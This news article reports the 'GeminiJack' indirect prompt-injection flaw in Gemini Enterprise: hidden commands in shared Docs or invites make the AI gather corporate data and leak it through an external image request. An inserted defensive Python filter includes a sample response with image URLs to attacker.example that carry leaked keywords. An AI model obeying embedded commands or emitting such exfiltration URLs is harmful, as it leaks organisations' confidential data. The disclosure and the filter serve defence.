Cybersecurity firm Noma Security recently disclosed a critical vulnerability, dubbed “GeminiJack,” in Google’s Gemini Enterprise platform and the Vertex AI Search tool. The flaw could allow unauthorized access to sensitive corporate data without any interaction from the targeted employee, while leaving minimal traces for detection.
The investigation by Noma Labs, part of Noma Security, found that the issue stemmed from an “architectural weakness” in the design of these enterprise AI systems, which process information across an organization’s Google services, such as Gmail, Calendar, and Docs. The design flaw was discovered on June 5, 2025, and the initial report was submitted to Google the same day, underscoring the urgency of the security risk involved.
The Hidden Attack Method
According to a recent blog post from Noma Security, GeminiJack is a sophisticated form of “indirect prompt injection.” The technique lets an attacker embed covert commands in shared content, such as a Google Doc or a calendar invitation. When an employee queries the Gemini Enterprise system, the AI treats the embedded commands as legitimate instructions and executes them, potentially accessing large amounts of company data.
The researchers found that even a single successful command could yield extensive confidential data, including complete calendar histories revealing critical business relationships, entire repositories of sensitive documents, and several years’ worth of email communications covering both customer information and financial discussions.
Significantly, the attacker does not need detailed knowledge of the targeted organization. Simple keywords such as “acquisition” or “salary” can prompt the AI to gather the relevant information, effectively conducting a surveillance operation on its owner. The exfiltrated data was then delivered to the attacker through a concealed external image request, which looks like ordinary web traffic generated during the AI’s data retrieval process.
Google’s Quick Response and Key Changes
In response to these findings, Noma Labs worked with Google to validate the identified vulnerabilities. Google promptly rolled out changes to the architecture of Gemini Enterprise and Vertex AI Search, altering how these systems interact with data sources. Notably, Vertex AI Search has since been isolated from Gemini Enterprise and no longer uses the same Retrieval-Augmented Generation (RAG) capabilities.
Experts’ Comments
The gravity of the GeminiJack vulnerability was emphasized by Sasi Levi, Security Research Lead at Noma Security, who commented that this case exemplifies an indirect prompt injection attack, necessitating meticulous scrutiny of all data streams accessed by the AI. Levi noted the lack of filtering for HTML output, which allowed an embedded image tag to trigger calls to the attacker’s server, leading to the unintentional sharing of sensitive internal data.
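The missing control Levi points to, filtering image references out of model output before it is rendered, can be sketched as follows. This is an added example, not Noma's or Google's code; the allowlisted host, the sample response and all function names are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption: the only host the chat UI may load images from (hypothetical).
ALLOWED_IMAGE_HOSTS = {"static.corp.example"}
MD_IMAGE = re.compile(r"!\[[^\]]*\]\(\s*<?([^)\s>]+)[^)]*\)")

def _allowed(url, hosts):
    # Only absolute https URLs on an allowlisted host pass; relative,
    # protocol-relative, data: and malformed URLs are all rejected.
    try:
        parts = urlsplit(url.strip())
    except ValueError:
        return False
    return parts.scheme == "https" and parts.hostname in hosts

class _ImageFilter(HTMLParser):
    """Re-emits HTML verbatim, dropping <img> tags that fail the allowlist."""
    def __init__(self, hosts):
        super().__init__(convert_charrefs=False)
        self.hosts, self.out, self.blocked = hosts, [], []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        src = a.get("src") or ""
        if tag == "img" and ("srcset" in a or not _allowed(src, self.hosts)):
            self.blocked.append(src)  # log for detection, do not render
            return
        self.out.append(self.get_starttag_text())
    handle_startendtag = handle_starttag
    def handle_endtag(self, tag): self.out.append(f"</{tag}>")
    def handle_data(self, data): self.out.append(data)
    def handle_entityref(self, name): self.out.append(f"&{name};")
    def handle_charref(self, name): self.out.append(f"&#{name};")

def filter_model_output(text, hosts=ALLOWED_IMAGE_HOSTS):
    """Return (safe_text, blocked_urls) for one model response."""
    blocked = []
    def md_sub(m):
        if _allowed(m.group(1), hosts):
            return m.group(0)
        blocked.append(m.group(1))
        return "[image removed]"
    parser = _ImageFilter(hosts)
    parser.feed(MD_IMAGE.sub(md_sub, text))
    parser.close()
    return "".join(parser.out), blocked + parser.blocked

# Constructed sample response, not captured traffic.
SAMPLE = ('Q3 summary: revenue up &amp; costs flat.<br>'
          '<img src="https://attacker.example/p.png?d=acquisition%20notes">'
          '<img src="https://static.corp.example/logo.png" alt="logo">'
          ' ![chart](https://attacker.example/c.png?d=salary)')
```

The returned list of blocked URLs is worth sending to logging: an image reference to an unknown host in an assistant response is a useful detection signal in its own right.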
Elad Luz, Head of Research at Oasis Security, said that the widespread nature of this vulnerability, combined with its low detection probability, underscores its significance. He stressed that while Google has patched the immediate issues, organizations must reassess their interconnected data sources. Trey Ford, Chief Strategy and Trust Officer at Bugcrowd, described the exploitation as an intriguing attack vector and suggested it will persist in future cybersecurity incidents, given that AI systems often interpret inputs within user contexts.